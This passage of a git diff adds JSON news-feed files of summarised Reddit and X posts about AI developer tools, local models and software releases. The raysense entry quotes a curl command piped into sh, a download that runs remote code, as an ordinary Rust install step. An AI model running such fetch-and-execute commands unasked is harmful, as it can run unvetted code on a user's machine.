who want less clutter/ugly UI's heres the github and some pics of it [https://github.com/jasperdevs/J-AI-Studio](https://github.com/jasperdevs/J-AI-Studio) [Main view](https://preview.redd.it/t786wcnikyyg1.png?width=1657&format=png&auto=webp&s=1900054e0ff13b094050769f15ab441ad0a13243) [\\\\\"Zen Mode\\\\\"](https://preview.redd.it/550ak82jkyyg1.png?width=1660&format=png&auto=webp&s=bdca9741ce07aecb6f6c6a179be0e4a0f4116b24) [Fullscreen on an image](https://preview.redd.it/p4spphgkkyyg1.png?width=1328&format=png&auto=webp&s=18f2c3442…", + "category": "creative_tools" + }, + { + "title": "Can I ask a noob question?", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2rilm/can_i_ask_a_noob_question/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T17:21:05.000Z", + "summary": "Hello all, I am extremely new to this AI video generation realm. Till now I was just generating images with Gemini (nano banana). While looking for video generations I saw higgsfield and eleven labs, but I can't pay for the steep prices. While looking for open source options, I found this sub. I have seen mentions of LTX and Wan for video generations. Does this sub has a beginner guide or something? If not can anyone guide me onto making good AI videos for instagram? Thank you.", + "category": "creative_tools" + }, + { + "title": "Built a local LLM inference engine on CachyOS — runs faster than llama.cpp on my 9070 XT", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2nm4u/built_a_local_llm_inference_engine_on_cachyos/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-03T14:54:30.000Z", + "summary": "Hey folks, we've been hacking on a Vulkan-based LLM engine the last few weeks, figured I'd share since I'm running it exclusively on CachyOS with Mesa RADV. 
It's called VulkanForge — single 14 MB Rust binary, no Python, no ROCm, just pure Vulkan compute shaders. Runs GGUF models (Q4\\_K\\_M etc.) and also native FP8 SafeTensors which llama.cpp can't even load. Some numbers on my RX 9070 XT (RADV Mesa 26.0.6): * Qwen3-8B Q4\\_K\\_M: 134 tok/s decode (llama.cpp does \\~129) * Mistral-7B: 132 tok/s (llama.cpp \\~124) * Native FP8 Llama-3.1-8B: 68 tok/s in 7.5 GB VRAM Everything works out of the box on CachyOS — just `cargo build --release` and go. No weird driver hacks needed, fish shell works fine too lol. GitHub: [https://github.com/maeddesg/vulkanforge](https://github.com/maeddesg/vulkanforge) Happy to answer questions if anyone wants to try it on their RDNA4 setup.", + "category": "creative_tools" + }, + { + "title": "Side-by-side comparison of Qwen-Image, ERNIE Base/Turbo, and FLUX.2 Dev across 8 custom styles (single RTX 5090)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2nkkt/sidebyside_comparison_of_qwenimage_ernie/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T14:52:46.000Z", + "summary": "Hey folks. I've been playing around at home picking which open-source image model to settle on for some prototyping work, and ended up doing a fun little side-by-side that maybe someone else will find useful. Same prompt and same seed across four models, with eight different style presets (AI generated). Completely amateur — no benchmarking rigor, just curiosity and a free weekend. 
# Tested models * **Qwen-Image-2512** (BF16) with **Qwen2.5-VL-7B** NVFP4 scaled text encoder * **ERNIE-Image Base** (BF16) with **Ministral 3 3B** text encoder * **ERNIE-Image Turbo** (BF16, 8-step DMD-distilled) with **Ministral 3 3B** text encoder * **FLUX.2 Dev** (NVFP4 mixed) with **Mistral 3 Small** (flux2 type, FP4 mixed) text encoder # Hardware * **GPU**: NVIDIA RTX 5090 (32 GB VRAM) * **CPU**: AMD Ryzen 9 9950X3D * **RAM**: 64 GB DDR5 # Notes Settings are whatever I found ideal for my hardware after a fair bit of trial and error — these are not necessarily community defaults, just what worked best on my machine. * **Qwen-Image** and **FLUX.2 Dev NVFP4** both spill heavily into system RAM during inference. They fill almost the entire VRAM and most of the system RAM at once. * **Qwen-Image-2512**…", + "category": "creative_tools" + }, + { + "title": "@Scobleizer Shares Full Resume of AI Industry Work in Response to Being Challenged", + "url": "https://x.com/Scobleizer/status/2050740859789103142", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-03T14:52:14.377Z", + "summary": "Scoble summarized his AI industry credentials: most complete X lists, alignednews.com news service, entrepreneur interviews, multiple company launches, and eight books about the future. 
The response provides a concise overview of his information infrastructure and editorial brand.", + "category": "ai_tools" + }, + { + "title": "What if ChatGPT launched in 1998", + "url": "https://reddit.com/r/ChatGPT/comments/1t2l80n/what_if_chatgpt_launched_in_1998/", + "source": "Reddit r/ChatGPT", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-03T13:16:47.000Z", + "summary": "Saw the Wikipedia premium screenshot and it got me thinking… Enjoy ✌️", + "category": "ai_tools" + }, + { + "title": "Set up multi-agent orchestration with Claude Code as the boss... am I overcomplicating this?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t2i664/set_up_multiagent_orchestration_with_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-03T10:49:45.000Z", + "summary": "Pretty new to AI but been deep on a side project for a while now. Got tired of one Claude session running out of context halfway through anything serious, so I rigged up an orchestration thing. Working well enough but I have no idea if I'm just reinventing the wheel. Setup looks like this: ( Please note it's work paying for all these , I wouldn't be spending my own money having this many agents etc ) **Main orchestrator**: Claude Code running Opus 4.7 (1M context, high effort) Premium team seat. This one talks to me, plans the work, reviews everything that comes back, decides what to fan out. Anything sensitive (auth, payments, db migrations, anything where conversation history matters) it does itself. **Subagents :** all called from bash via wrapper scripts in ./agents/: * **claude-sub** : another Claude Code (Opus 4.7 High) premium team seat on a worker account so my main quota isn't drained. Fresh context. Used for \"review your own diff with fresh eyes\" or well-specified subtasks. * **codex:** GPT-5.5 via Codex CLI. Team plan . 
Mostly the per-task reviewer with mocks attached via --image. * **codex-sub:** GPT-5.5 via Codex CLI. Team plan. Because with work I have the two accoun…", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-04.json b/data/news-feed-2026-05-04.json new file mode 100644 index 0000000..d34c400 --- /dev/null +++ b/data/news-feed-2026-05-04.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:37.711Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-04", + "article_count": 15, + "archived_story_count": 617, + "articles": [ + { + "title": "Local MCP server that tells Claude Code what would break before it edits a file (raysense, MIT, free)", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3jhnz/local_mcp_server_that_tells_claude_code_what/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-04T14:33:50.000Z", + "summary": "A pattern I keep hitting in Claude Code: I ask the agent to refactor something modest -- a parsing utility, a helper, a config loader -- and the diff it produces looks fine. Tests in the file pass. I run CI and three unrelated tests blow up. Sometimes the broken caller is code I have not touched in months. The agent is not careless. It read the file. What it could not do was *see the codebase*: the dependency graph, the call sites, the modules that lean on each other, the cycles, the test coverage of each piece. Plain text never reveals this. You cannot grep your way to \"what would break if I delete this function.\" We built **raysense** to close that gap. It is a single Rust binary + Claude Code plugin + stdio MCP server that gives Claude structural memory of your codebase. 
**Free, MIT-licensed, local-only -- no SaaS, no API key, no telemetry.** It ships from crates.io and builds from source on first install, so the only prerequisite is a Rust toolchain (`cargo`) on the machine. If you don't have it yet: ``` curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ``` After that, `cargo install raysense` is the whole installation. (Disclosure: I am part of the team behind it…", + "category": "ai_tools" + }, + { + "title": "claudely: launch Claude Code against Local LLM provider like LM Studio / Ollama / llama.cpp without trashing your real claude config", + "url": "https://reddit.com/r/ClaudeAI/comments/1t38e7c/claudely_launch_claude_code_against_local_llm/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-04T05:19:34.000Z", + "summary": "Plenty of CLI coding agents will talk to a local LLM, but the catch is the ecosystem. Skills, slash commands, MCP servers, plugins, hooks: all the interesting tooling has been built specifically for Claude Code, and parity on every other agent is patchy at best. Trying to reuse a Claude-shaped workflow on a different agent quickly turns into \"rewrite all the plugins\" or \"do without.\" claudely skips that fight. You keep Claude Code as the client (and its whole plugin / skill / MCP ecosystem with it), and just point it at a model running on your own hardware. Pick a provider, claudely spawns \\`claude\\` with the right base URL, auth, and cache fix wired up for that one session. Your shell and the regular \\`claude\\` command stay untouched, so you can flip between local and the real Anthropic API without thinking about it. It also quietly fixes a prompt-cache bug that otherwise tanks local-model speed by \\~90%, and handles the per-provider env-var differences for you. 
Works with LM Studio, Ollama, llama.cpp, or any Anthropic-compatible endpoint (point it at a litellm or claude-code-router proxy for OpenAI-protocol backends like vLLM). npm i -g claudely claudely # LM Studio, picker over…", + "category": "ai_tools" + }, + { + "title": "Releasing the Data Analyst Augmentation Framework (DAAF) version 2.1.0 today -- still fully free and open source! In my very biased opinion: DAAF is now finally the best, safest, AND easiest way to get started using Claude Code for respons…", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3ryo1/releasing_the_data_analyst_augmentation_framework/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-04T19:28:17.000Z", + "summary": "https://preview.redd.it/o74lppqd86zg1.png?width=1456&format=png&auto=webp&s=3a904bae42b8130e2c6382be55debe8f6ef4d6ca When I launched the Data Analyst Augmentation Framework [v2.0.0 six weeks ago](https://daafguide.substack.com/p/daaf-v200-is-finally-here-from-usable), I wrote that the major update was about going “from usable to useful” -- rebuilding the orchestrator system for maximum flexibility and efficiency, adding a variety of more responsive engagement modes, and deepening the roster of methodological knowledge that DAAF could pull upon as needed for causal inference, geospatial analysis, science communication and data visualization, supervised and unsupervised machine learning, and much, much more. But while DAAF continued to get more capable and more useful for those actually using it… Well, it was still extremely annoying to use, generally obtuse, and hard to get started with, which means a lot of people who were interested were simply bouncing off of it. **That all changes with the v2.1.0 update**, which I’m cheekily calling the Frictionless Update for three key reasons: # 1. 
Installation happens in one line now From a fresh computer to talking with a DAAF-e…", + "category": "ai_tools" + }, + { + "title": "Top 6 Claude Skills: 15th April to 3rd May", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3qmqy/top_6_claude_skills_15th_april_to_3rd_may/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-04T18:42:21.000Z", + "summary": "Found some Open Source Claude skills from last 15 days. Some of them are pretty decent to use, personally liked the npm downloads one. Check out: **- brand-alchemy:** A brand strategy and naming skill that interrogates your thoughts for branding first, then applies phonosemantics, category design frameworks, and auto-checks domain availability across any TLD. **- npm-downloads-to-leads:** Give it a list of npm packages. It pulls 12 weeks of download data, scores each one by growth velocity, maps maintainers to GitHub and X, and gives you a ranked lead brief who built it, how to reach them, and what to say. **- hyperframes:** Write HTML, render video. Built for agents. Handles HTML-to-video rendering with ffmpeg, GSAP animations, and puppeteer automation great for auto-generating video content from code. **- email-newsletter:** Draft and design a complete HTML email newsletter from a topic or content brief. Paste-ready output for Loops, Mailchimp, Beehiiv, Resend, and most email platforms. **- pricing:** Help figure out pricing for a product or service using minimalist entrepreneur principles. 
Comes straight from the book 'The minimalist Entrepreneur\" playbook cost-based, value-bas…", + "category": "ai_tools" + }, + { + "title": "built a plugin so my parallel Claude Code sessions can message each other instead of me alt-tabbing", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3osat/built_a_plugin_so_my_parallel_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T17:38:22.000Z", + "summary": "I usually have two or more Claude Code sessions open at once. One in the backend repo, one in the frontend. Half the time I'd be in the frontend asking \"wait, what shape did the user object end up as?\", then alt-tab, ask the backend session, copy the answer, alt-tab back, paste. The other Claude was right there. It already knew. I was the bottleneck. So I wrote a plugin called Relay. In the frontend window I just say: ▎ask the backend session what the user object looks like The backend session sees the question between turns, answers it, and the reply pops up in my frontend session as a notification. No window switching. No copy-paste. Works for broadcasts too, like \"ask everyone what they're working on\", and the replies trickle in one at a time. The mechanism is simpler than it sounds. Claude Code shipped a channels capability a while back that lets MCP servers push messages into a session between turns. Relay piggybacks on that. Each session runs a tiny MCP server, a single hub daemon on your machine routes between them over a unix socket, and inbound asks land as channel notifications so Claude reacts to them naturally on its next turn. First session you start spawns the hub. I…", + "category": "ai_tools" + }, + { + "title": "Your Claude Code agent is always working from stale context. 
I built it a fix it can rewind, replay, and stay ahead of every edit.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3du61/your_claude_code_agent_is_always_working_from/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 0.99, + "date": "2026-05-04T10:33:23.000Z", + "summary": "Every long Claude Code session has the same hidden failure mode: the agent is always working from stale context. It re-reads the same 12 files across three sessions to \"remind itself\" of an interface you already showed it. It refactors getUserById without checking who calls it. It edits a config with no memory of why the previous version was that way. It's not the context window. The window is fine. There's no persistent, time-aware representation of your codebase for the agent to re-query. So it guesses. And you pay tokens for every re-read. I built Memtrace to fix exactly this. Two things it does that no other memory tool does: **(1) Always-fresh state.** Every edit you make triggers a 42ms incremental snapshot of the changes applied by the coding agent. The agent's memory is never one-session-old. After a refactor it knows the blast radius before you do: every caller, every test, every consumer of the function you just touched. Your agent stops asking \"what does getUserById return?\" 30 seconds after seeing it. **(2) Rewind and replay.** This is the part nobody else has. Your codebase is stored bi-temporally so every change becomes a recallable episode. 
When the agent debugs a r…", + "category": "ai_tools" + }, + { + "title": "ChatGPT’s fixation on my past conversations has made it borderline unusable", + "url": "https://reddit.com/r/ChatGPT/comments/1t35tbg/chatgpts_fixation_on_my_past_conversations_has/", + "source": "Reddit r/ChatGPT", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.96, + "date": "2026-05-04T03:07:30.000Z", + "summary": "in the past, I feel like I could count on coming to ChatGPT and, generally speaking, get the “best“ answer when I asked a question or wanted to explore an idea. for some time now, this is no longer the case. At some point, chat became so obsessed with everything it knows about me that it seems to be no longer capable of providing the best answer. it just provides answers that relate to things I’ve mentioned in the past, answers that include interests I’ve told it about, answers that continue/build on previous ideas that I’ve explored, etc. overly simplified example: going to chat and asking for the best album or book of 2026, and getting an answer that is entirely based on the literary or musical interests that I’ve told it about in the past. sometimes (most times???) I just want answers “in a vacuum” - I don’t want my biases or my interests informing the response. it’s become a serious problem when you’re trying to explore creative ideas or use the tool to think about something in a novel way, and it’s just digging for things that it can say that relate to your past conversations at all costs instead. 
its like a new version of the “people pleasing“ that we were all griping about…", + "category": "ai_tools" + }, + { + "title": "Turbo v2.9.9 released", + "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.9", + "source": "GitHub Releases · Turbo", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-05-04T20:55:20.000Z", + "summary": "\n\n## What's Changed\n### Changelog\n* release(turborepo): 2.9.8 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12700\n* fix: Remove Unix parent death watchdogs by @anthonyshew in https://github.com/vercel/turborepo/pull/12699\n* release(turborepo): 2.9.9-canary.1 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12705\n* fix: Scope repo index prefixes to Git root by @anthonyshew", + "category": "ai_tools" + }, + { + "title": "pnpm v11.0.5 released", + "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.5", + "source": "GitHub Releases · pnpm", + "tags": [ + "github_release", + "cli_tool" + ], + "matching_tags": [ + "github_release", + "cli_tool" + ], + "importance": 0.9199999999999999, + "date": "2026-05-04T20:22:16.000Z", + "summary": "## Patch Changes\r\n\r\n* Drop the `darwin-x64` artifact from `@pnpm/exe` and from the GitHub release page. The Node.js SEA mechanism `pnpm pack-app` uses produces a binary that segfaults at startup on Intel Macs because of an upstream Node.js bug ([nodejs/node#62893](https://github.com/nodejs/node/issues/62893), tracked alongside [#59553](https://github.com/nodejs/node/issues/59553); the Node.js team has [opted not to fix it](https://github.com/nodejs/node/pull/60250) on the grounds that x64 macOS ", + "category": "ai_tools" + }, + { + "title": "A new open weights image model appears in ArtificialAnalysis. 
Outperforming Flux.2 Pro and Z Image Turbo.", + "url": "https://reddit.com/r/StableDiffusion/comments/1t3rd6m/a_new_open_weights_image_model_appears_in/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-04T19:07:33.000Z", + "summary": "A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.", + "category": "creative_tools" + }, + { + "title": "Machines Are Getting Onchain Passports and Credit Ratings Now — peaqOS Is Live", + "url": "https://x.com/peaq/status/2051288009081782473", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-04T14:56:47.726Z", + "summary": "peaq launched peaqOS, giving physical machines verifiable digital identities, passports, and credit ratings recorded on-chain. The company also welcomed its first non-human team member. The machine economy is not a future concept anymore.", + "category": "ai_tools" + }, + { + "title": "AI Invented a Math Framework. Humans Used It to Solve Two 60-Year-Old Conjectures", + "url": "https://x.com/WesRoth/status/2051300819878936591", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T14:56:47.725Z", + "summary": "An AI-generated mathematical framework originally used to solve Erdős Problem 1196 has now been generalized to prove a second 60-year-old conjecture. The model did not assist the discovery. 
It was the discovery.", + "category": "ai_tools" + }, + { + "title": "Cursor Team Kit Just Released — The Internal Skills the Cursor Team Uses to Build Cursor", + "url": "https://x.com/ericzakariasson/status/2051255780167610522", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-04T14:56:47.725Z", + "summary": "The Cursor engineering team open-sourced Cursor Team Kit, containing the internal slash commands they use to build the Cursor editor at Cursor. It includes verify-this, fix-merge-conflicts, pr-review-canvas, and cli-automation-harness.", + "category": "ai_tools" + }, + { + "title": "Ace-Step-1.5-Api-server-UI", + "url": "https://reddit.com/r/StableDiffusion/comments/1t39bjl/acestep15apiserverui/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-04T06:10:23.000Z", + "summary": "[Ace-Step-1.5-Api-server-UI](https://github.com/tritant/Ace-Step-1.5-Api-server-UI) # Features [](https://github.com/tritant/Ace-Step-1.5-Api-server-UI#features) * **Compose** — Text-to-music generation with full parameter control * **Cover** — Style transfer from a reference audio * **Repaint** — Selective region editing with WaveSurfer timeline * **Base ★** — Exclusive Base model modes: * 🧱 **Lego** — Add a specific instrument track to an existing mix * 🔬 **Extract** — Isolate a stem from a mix * 🎹 **Complete** — Generate accompaniment for an existing track * Multi-track timeline with per-track solo/mute/volume * Persistent configuration via localStorage * Batch generation support * Multi lora support", + "category": "creative_tools" + }, + { + "title": "Meta Abandons Open Source — Days After LlamaCon", + "url": "https://x.com/thenewstack/status/2050017453615301067", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + 
"importance": 1, + "date": "2026-05-03T23:53:43.957Z", + "summary": "Meta abandoned open-source Llama for proprietary Muse Spark just days after LlamaCon celebrated one billion downloads, a dramatic reversal with major implications for the AI developer community.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-05.json b/data/news-feed-2026-05-05.json new file mode 100644 index 0000000..2ac0f3f --- /dev/null +++ b/data/news-feed-2026-05-05.json @@ -0,0 +1,269 @@ +{ + "generated": "2026-06-05T00:44:37.852Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-05", + "article_count": 15, + "archived_story_count": 540, + "articles": [ + { + "title": "torch-nvenc-compress: GPU NVENC silicon as a PCIe bandwidth multiplier — PCA + pure-ctypes Video Codec SDK wrapper. Parallel-path overlap measured at 67% of theoretical max on a real GEMM + encode workload. [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t2zy4h/torchnvenccompress_gpu_nvenc_silicon_as_a_pcie/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-03T22:43:17.000Z", + "summary": "I've been working on the consumer-multi-GPU PCIe bottleneck — Nvidia removed NVLink from the 4090/5090, and splitting a 70B model across two consumer cards drops you to \\~30 GB/s over PCIe peer-to-peer. Spent the last few months building a Python library that uses the GPU's otherwise-idle NVENC/NVDEC silicon to compress activations and KV cache on the fly, then ships the small bitstream across the same wire. 
**Repo:** [https://github.com/shootthesound/torch-nvenc-compress](https://github.com/shootthesound/torch-nvenc-compress) (Apache 2.0) # Prior art (this isn't novel as an idea) * **LLM.265 — \"Video Codecs are Secretly Tensor Codecs\"** (late 2025). The closest direct precedent: same insight applied to LLM weights, activations, KV cache. * **KVFetcher** (April 2026). KV compression for remote prefix fetching. * **CodecFlow** (April 2026). Codec motion-vector metadata for KV refresh during prefill. The \"video codec on tensors\" idea was already in the literature when I started. What's added in this work: 1. **PCA + rank-truncation as preprocessing.** Activations and KV in their standard basis are noise-like (\\~4× compression floor, basically the Gaussian-noise limit). The PCA basis…", + "category": "ai_research" + }, + { + "title": "Released a TurboQuant-compatible KV backend evaluation SDK", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t4ls7i/released_a_turboquantcompatible_kv_backend/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T17:12:04.000Z", + "summary": "Disclosure: I am the author of this evaluation SDK. I released an independent TurboQuant-compatible KV backend evaluation package for compressed-KV ABI testing, smoke tests, and partial attention decode experiments. 
The goal is narrow: test whether compressed KV-cache workloads can be routed through a clean low-level backend ABI for: \\- compressed KV block registration \\- KV dot / QK partial execution \\- block-local attention partial decode \\- capability probing \\- fallback and correctness reporting \\- minimal benchmark validation Repository: [https://github.com/ixu2486/tq\\_compat\\_eval](https://github.com/ixu2486/tq_compat_eval) This is not a Google project, not an official TurboQuant implementation, and not a replacement for TurboQuant, llama.cpp, or existing model runtimes. It is also not the full RetryIX runtime. The private runtime, scheduling policy, hardware-interface contracts, and internal routing logic are not included. I would appreciate feedback from people working on KV-cache optimization, quantized inference, compressed-KV formats, long-context decoding, or backend integration.", + "category": "ai_models" + }, + { + "title": "Node.js v26.0.0 released (MAJOR UPDATE)", + "url": "https://github.com/nodejs/node/releases/tag/v26.0.0", + "source": "GitHub Releases · Node.js", + "tags": [ + "api_update", + "github_release", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "github_release", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-05T14:21:26.000Z", + "summary": "\n\n\nWe're excited to announce the release of Node.js 26! 
Highlights include the Temporal API enabled by default,\nupdates to the V8 JavaScript engine to 14.6, Undici to 8.0, and several important deprecations and removals\nas we continue to modernize the platform.\n\nAs a reminder, Node.js 26 will enter long-term support (LTS) in October, but until then, it will be the \"Current\" release for the next six months.\nWe encourage you to explore the new features and benefits offered by this latest release a", + "category": "ai_tools" + }, + { + "title": "Anthropic ships Claude for Creative Work with nine MCP-native connectors", + "url": "https://reddit.com/r/ClaudeAI/comments/1t48vtx/anthropic_ships_claude_for_creative_work_with/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T08:00:42.000Z", + "summary": "Anthropic announced Claude for Creative Work on April 28. The release includes nine official connectors that plug Claude into professional creative software, with a native Blender connector as the flagship. All nine are built on the Model Context Protocol (MCP), so Claude can read live project state and execute actions directly inside each app rather than operating through copy-paste workflows. The MCP piece is what makes this more than a plugin announcement. This is one of the first production-scale deployments where an LLM maintains persistent context within a host application's own data model. If the pattern holds up, it probably becomes the template for how agents integrate with domain-specific software more broadly. What creative tools would benefit most from this kind of native agent integration? I'd guess video editing is high on the list, but curious what others think. 
Announcement: [https://www.anthropic.com/news/claude-for-creative-work](https://www.anthropic.com/news/claude-for-creative-work)", + "category": "ai_tools" + }, + { + "title": "Offload routine Claude Code work to Gemma 4 through the Google GenAI API", + "url": "https://reddit.com/r/ClaudeAI/comments/1t4sj9u/offload_routine_claude_code_work_to_gemma_4/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-05T21:08:53.000Z", + "summary": "The idea of offload-mcp is simple: instead of running hardware-hungry local models for routine work, let Claude offload that work to FREE model APIs and SAVE tokens. I’m using Gemma via the Google GenAI API because I like it in my processing pipelines, but running it locally on my MacBook Air is slow and resource-limited. The API path is much more practical for small jobs. I didn't find any other tool on GitHub or elsewhere to handle that. offload-mcp takes care of commit messages, PR summaries, translations, docstrings, source diff/file summaries, and freeform prompts. Freeform is what I use most: send almost any routine prompt to a cheaper model instead of burning expensive Claude Code or Codex context on it. The source-based mode can read local diffs/files directly through the MCP server and reports estimated primary input tokens avoided. The default model chain uses Gemma, but model IDs are configurable. Curious if this fits anyone else’s Claude workflow! 
GitHub: [https://github.com/peterhadorn/offload-mcp](https://github.com/peterhadorn/offload-mcp)", + "category": "ai_tools" + }, + { + "title": "Anomaly Detection Belongs in Your Database — built SIMD-accelerated isolation forests into Stratum's SQL engine [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t4riem/anomaly_detection_belongs_in_your_database_built/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-05T20:31:23.000Z", + "summary": "We added native anomaly detection in Stratum, our columnar analytics engine for the JVM. Train and score isolation forest models entirely from SQL — no Python, no export pipeline: SELECT * FROM transactions WHERE ANOMALY_SCORE('fraud_model') > 0.7; 6 microseconds per transaction, SIMD-accelerated, runs inside the query engine. The full write-up covers why we built it, how isolation forests work, and benchmarks against PyOD/scikit-learn: [https://datahike.io/notes/anomaly-detection-in-your-database/](https://datahike.io/notes/anomaly-detection-in-your-database/) Stratum is open source (Apache 2.0): [https://github.com/replikativ/stratum](https://github.com/replikativ/stratum) Happy to answer questions about the implementation — the isolation forest is pure Java with Vector API SIMD, scoring is fused into the query execution pipeline so it benefits from zone map pruning and chunked streaming.", + "category": "ai_research" + }, + { + "title": "Gemini has a big outage going on but refuses to acknowledge on official status page! 
How do you know if an LLM API is actually down vs just you?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t4kbpa/gemini_has_a_big_outage_going_on_but_refuses_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-05T16:22:20.000Z", + "summary": "Genuine question. Gemini had a 5+ hour outage this morning. I found out because a user reported it on Tickerr, not because Google said anything. Status page was green the whole time. I built Tickerr using Claude Code for this only. It runs independent streaming API calls to LLM providers every 5 minutes and tracks real inference performance - not just HTTP pings. https://preview.redd.it/r6ugn0e57bzg1.png?width=1080&format=png&auto=webp&s=779961c2ee83245f9a46c10ced99f0ddc854494b The other way to know it's not just you is if other people are hitting the same thing at the same time. Which is why I also built a crowdsourced failure signal into [Tickerr.ai](https://tickerr.ai/mcp-server) \\- agents report 5xx errors anonymously and get back whether others are seeing the same thing. 
It's free to try, if you want to add reporting to your agent, three ways depending on your setup: **MCP (Claude Code, Cursor, Windsurf):** report_incident(provider=\"google\", model=\"gemini-2.5-flash\", error_code=503, error_type=\"overloaded\") **REST (any language):** curl -X POST https://tickerr.ai/api/v1/report \\ -H \"Content-Type: application/json\" \\ -d '{\"provider\":\"google\",\"model\":\"gemini-2.5-fla…", + "category": "ai_tools" + }, + { + "title": "SenseNova-U1-8B-MoT (novel open source multimodal understanding + image generation model) seems like a bigger deal architecturally then it’s getting credit for", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t4i1yx/sensenovau18bmot_novel_open_source_multimodal/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T15:02:15.000Z", + "summary": "SenseNova dropped SenseNova-U1 on the last day of April and I’ve only found like one other mostly ignored post on this sub talking about it. It seems like a really exciting novel architecture to me. It appears to be exceptional at text-to-infographics as one of its major high points, as well as being good at image editing, generation, and visual understanding. Supposedly it’s not the traditional mash-up (no VAE) types of multimodal models 